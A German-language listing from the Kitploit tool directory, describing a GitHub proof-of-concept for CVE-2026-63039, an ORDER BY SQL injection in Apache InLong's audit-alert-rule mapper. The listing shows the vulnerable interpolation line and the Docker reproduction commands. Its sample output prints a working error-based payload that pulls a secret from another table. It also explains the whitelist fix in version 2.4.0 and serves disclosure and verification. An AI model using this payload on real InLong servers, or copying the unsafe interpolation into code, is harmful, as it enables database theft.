Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-63039 — Proof-of-Concept für CVE-2026-63039, der eine ORDER-BY-SQL-Injection in der AuditAlertRule von Apache InLong über orderField/orderType demonstriert, mit einem Docker-basierten Reproduktionssetup und Fix-Verifizierung. | Kitploit
Tools/GitHubGitHub/oscerd/cve-2026-63039
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHuboscerd/cve-2026-63039

CVE-2026-63039

Proof-of-Concept für CVE-2026-63039, der eine ORDER-BY-SQL-Injection in der AuditAlertRule von Apache InLong über orderField/orderType demonstriert, mit einem Docker-basierten Reproduktionssetup und Fix-Verifizierung.

Repository anzeigen
vor 8h 30mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-63039 — Apache InLong AuditAlertRule SQL-Injektion in ORDER BY

Ausführbarer Proof-of-Concept-Reproduktionscode für die SQL-Injektion in der Audit-Alert-Rule-Abfrage von Apache InLong.

Der InLong-Manager-Mapper AuditAlertRuleEntityMapper.selectByCondition filtert mit sicheren MyBatis-#{}-Parametern, sortiert aber mit ${}-String-Interpolation von zwei Anfragefeldern:

root@kitploit:~
<!-- inlong-manager/manager-dao/src/main/resources/mappers/AuditAlertRuleEntityMapper.xml  (InLong 2.0.0–2.3.x) -->
order by ${request.orderField} ${request.orderType}

orderField und orderType stammen aus der paginierten Anfrage (AuditAlertRulePageRequest), sind also angreiferkontrolliert und werden unverändert in das SQL eingefügt — SQL-Injektion in ORDER BY (CWE-89). Dieser PoC injiziert einen auf MySQL-Fehlern basierenden Payload in orderField und liest ein Geheimnis aus einer , was die Offenlegung beliebiger Daten demonstriert.

Tool herunterladen
nicht zusammenhängenden Tabelle

Ausführen

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build     # starts MySQL, seeds it, runs the one-shot PoC
docker compose down -v

Erwartete Ausgabe auf dem verwundbaren Codepfad:

root@kitploit:~
[1] Benign request (orderField='id', orderType='ASC'): 3 rows
      AuditAlertRule{id=1, inlongGroupId=group_a, alertName=latency rule}
      ...
[2] Malicious request (orderField = error-based payload):
      orderField = extractvalue(1,concat(0x7e,(select secret_value from manager_secrets limit 1)))
      extracted from another table via the injected subquery: INLONG-SECRET-63039
>>> PROVEN: ... ORDER BY SQL injection (CWE-89): true

Schwachstellenübersicht

EigenschaftWert
ProjektApache InLong — Manager (AuditAlertRuleService / AuditAlertRuleEntityMapper)
KlasseCWE-89 Unsachgemäße Neutralisierung von Sonderelementen in einem SQL-Befehl ('SQL-Injection')
AngriffsvektorDie orderField- / orderType-Felder einer Audit-Alert-Rule-Seitenanfrage
AuswirkungBeliebige SQL-Ausführung / Datenoffenlegung gegenüber der InLong-Manager-Datenbank
Betroffene Versionenvon 2.0.0 bis vor 2.4.0
Behobene Version2.4.0
SicherheitshinweisCVE-2026-63039
DanksagungAndrea Cosentino

Der Fix

Apache InLong 2.4.0 validiert orderField / orderType anhand einer Whitelist bekannter sortierbarer Spalten und Richtungen, bevor sie den Mapper erreichen (ein ORDER BY-Spaltenname kann nicht als #{}-Parameter gebunden werden, also müssen die Sortiereingaben validiert statt parametrisiert werden).

Der MyBatis-Mapper, die Entität und das Request-Pojo in diesem Repository spiegeln die InLong-Originale wider, sodass die Injektionssenke (order by ${request.orderField} ${request.orderType}) unverändert reproduziert wird.

Haftungsausschluss

Dieses Repository wird zu Bildungs- und Verteidigungszwecken veröffentlicht: um Apache-InLong-Benutzern zu helfen, die Schwachstelle zu verstehen, zu überprüfen, ob sie betroffen sind, und zu bestätigen, dass ein Upgrade sie behebt. Der Payload liest lediglich ein Demo-Geheimnis aus einer lokalen Tabelle. Verwenden Sie dieses Material nicht gegen Systeme, die Sie nicht besitzen oder betreiben.